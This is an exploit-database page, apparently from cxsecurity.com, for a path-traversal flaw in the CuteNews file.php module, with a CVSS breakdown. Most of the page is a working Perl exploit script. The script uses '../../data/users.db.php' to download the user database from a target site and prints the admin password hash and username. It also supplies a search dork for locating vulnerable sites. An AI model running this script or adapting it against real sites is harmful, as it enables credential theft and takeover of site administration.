CuteNews Arbitrary File Download AllVersion

2008.01.05
Credit: Pr0metheuS
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

!/usr/bin/perl #Found by Pr0metheuS #Coded by Pr0metheuS #CuteNews 2.6 ( module file.php ) #Gr33tz-TeaM #Dork : inurl:/cutenews/file.php use LWP::UserAgent; if(@ARGV!=2){ print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n"; print "-=-=-= By Pr0metheuS -=-=-=-=-\n"; print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n"; print "-=-=-= Gr33tz To : -=-=-=-=-\n"; print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n"; print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "USAGE : perl $0 <SITE> <PATH>\n"; exit; } ($SITE,$PATH)=@ARGV; $ua = new LWP::UserAgent; $ua->agent("Mozilla/8.0"); $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php"); $req->header('Accept' => 'text/html'); $res = $ua->request($req); $con = $res->content; if($res->is_success){ if($con =~ /([0-9a-fA-F]{32})/){ $hash = $1; print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n"; print "-=-=-= By Pr0metheuS -=-=-=-=-\n"; print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n"; print "-=-=-= Gr33tz To : -=-=-=-=-\n"; print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n"; print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "_____________________________\n"; print "[+] Exploit Work!\n"; print "[+] Admin Pass : ".$hash."\n"; $ua2 = new LWP::UserAgent; $ua2->agent("Mozilla/8.0"); $ua2 = LWP::UserAgent->new; my $req2 = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php"); $req2->header('Accept' => 'text/html'); $res2 = $ua2->request($req2); $con2 = $res2->content; if($con2 =~ /\|.\|(.*)\|$hash\|/){ $user = $1; print "[+] Admin Username : ".$user."\n"; } } else{ print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n"; print "-=-=-= By Pr0metheuS -=-=-=-=-\n"; print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n"; print "-=-=-= Gr33tz To : -=-=-=-=-\n"; print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n"; print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "_____________________________\n"; print "[+] Connect failed..\n"; } } else{ print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n"; print "-=-=-= By Pr0metheuS -=-=-=-=-\n"; print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n"; print "-=-=-= Gr33tz To : -=-=-=-=-\n"; print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n"; print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "_____________________________\n"; print "[+] Exploit Failed..\n"; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top